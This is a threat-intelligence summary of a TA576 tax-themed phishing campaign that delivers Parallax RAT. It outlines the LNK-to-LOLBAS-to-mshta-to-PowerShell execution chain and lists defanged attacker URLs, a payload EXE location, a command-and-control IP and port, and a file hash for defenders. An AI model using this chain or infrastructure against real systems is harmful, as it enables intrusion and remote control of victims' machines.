Keypoints
- TA576 resumed tax-season campaigns in Jan 2024 using compromised accounts and reply-to addresses pointing to attacker-controlled domains.
- Initial replies are met with malicious Google Firebase (web.app) URLs that redirect to ZIP archives containing LNK shortcut files.
- The shortcut (LNK) executes a SyncAppvPublishingServer.vbs LOLBAS injection that runs encoded PowerShell which launches Mshta to retrieve an HTA payload.
- The HTA runs PowerShell to AES-decrypt and decompress another command that downloads and executes an EXE in %appdata%, using obfuscation and multi-stage scripting.
- The final executable uses the “Heaven’s Gate” evasion technique and installs Parallax RAT, which contacts a C2 at 193[.]142[.]146[.]101:20190.
- Indicators include multiple web.app redirect URLs, HTA hosts, an EXE URL (sew1.exe), a Parallax RAT SHA256, and the listed C2 IP:port.
MITRE Techniques
- [T1218] Signed Binary Proxy Execution (LOLBAS) – Use of a legitimate script for proxy execution: ‘ran encoded PowerShell via the SyncAppvPublishingServer.vbs LOLBAS inject.’
- [T1218.005] Mshta – Launching HTML Application to execute payload: ‘The PowerShell command launched Mshta to run the HTML application (HTA) payload from a provided URL.’
- [T1059.001] PowerShell – Scripted execution and decryption stages: ‘The HTA payload ran a PowerShell command to AES decrypt and decompress another command that downloaded an executable to the %appdata% folder and ran it.’
- [T1204.002] User Execution: Malicious File (LNK) – Shortcut file used to trigger further execution: ‘it redirected to the download of a zipped shortcut (LNK) file. If this shortcut was executed, it ran encoded PowerShell…’
- [T1105] Ingress Tool Transfer – Staging and transfer of the final payload: ‘downloaded an executable to the %appdata% folder and ran it.’
- [T1027] Obfuscated Files or Information – Use of encoding/obfuscation in scripts: ‘encoded PowerShell’ and ‘Obfuscated PowerShell’ used in multiple stages.
Indicators of Compromise
- [Email address] TA576 reply-to address used in campaigns – bvillegas@mountain-alliance[.]com
- [URLs] Firebase/web.app redirect targets – redirectit1[.]web[.]app, uploadfile2024[.]web[.]app/2023-FILES-MY1040-w2[.]zip (and other web.app redirects)
- [HTA/host] HTA payload hosting examples – g3w2host[.]web[.]app/G3w2, charitytechw[.]com/Knitste12
- [Executable URL] Final payload location – charitytechw[.]com/sew1[.]exe
- [C2 IP] Parallax RAT command-and-control – 193[.]142[.]146[.]101:20190
- [File hash] Parallax RAT SHA256 – f6c901d8959b26428c5fbb9b0c4a18be2057bb4d22e85bfe2442c0a8744a9ff6
TA576’s technical attack chain begins with low-volume tax-themed email lures sent from compromised accounts where the reply-to points to attacker-controlled domains. Targets that respond receive a Firebase (web.app) URL which redirects to a ZIP containing a shortcut (LNK) file; executing that shortcut triggers a SyncAppvPublishingServer.vbs LOLBAS injection that runs encoded PowerShell.
The PowerShell stage reconstructs obfuscated strings (the shortcut uses sequences of numbers with a subtraction constant that varies by sample) and launches mshta to fetch an HTA payload from attacker hosts. The HTA executes PowerShell that AES-decrypts and decompresses an additional command; that command downloads an executable into %appdata% and launches it, using layered obfuscation across multiple scripts to hinder analysis.
The final executable employs the “Heaven’s Gate” evasion technique to run Parallax RAT, which attempts callback to a C2 at 193[.]142[.]146[.]101:20190. Detection and mitigation should focus on blocking the listed web.app redirectors and hosting domains, monitoring for LNK-triggered mshta/PowerShell chains, and flagged hashes/C2 indicators.
Read more: https://www.proofpoint.com/us/blog/threat-insight/security-brief-tis-season-tax-hax